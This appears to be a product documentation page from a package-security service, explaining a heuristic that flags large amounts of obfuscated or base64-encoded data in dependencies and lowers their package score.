Encrypted/Encoded Blob Detection

Identifies encrypted/encoded data in customer dependencies that may be indicative of attempts to hide data and activity.

Description

Malware often attempts to hide activities by obfuscating data, strings and functions in the package source code. This inhibits analysis of the application by masking critical mechanisms the malicious code uses to operate.

The obfuscations are typically trivial to unravel, leveraging common encodings like base64. While the presence of high entropy, or encoded blocks of data are not indicative of malware generally, nearly all malware will include some encrypted/encoded data blocks.

We identify obfuscated data in the source code of customer dependencies. If the volume of obfuscated blocks exceeds the requisite threshold, we negatively penalize the package score.

Importance

Large numbers of obfuscated strings are uncommon in benign software. A package that uses large numbers of obfuscated strings may be attempting to hide malicious behavior from the developer.

Risk Domains

Malicious Code, Author

Impact on the Phylum Package Score

The presence of encrypted/encoded/obfuscated strings is not, by itself, indicative of malicious behavior. It is, however, and interesting data point. Large numbers of obfuscated strings will have a moderate affect on lowering the package score.

Examples from the past

Obfuscated strings appear across most Javascript exploit kits. The goal here is to hide behavior. The screenshot below is taken directly from a malicious code sample from 2017.

The long strings (in blue) likely contain calls to perform some malicious action. These sorts of items are identified by this heuristic.


Did this page help you?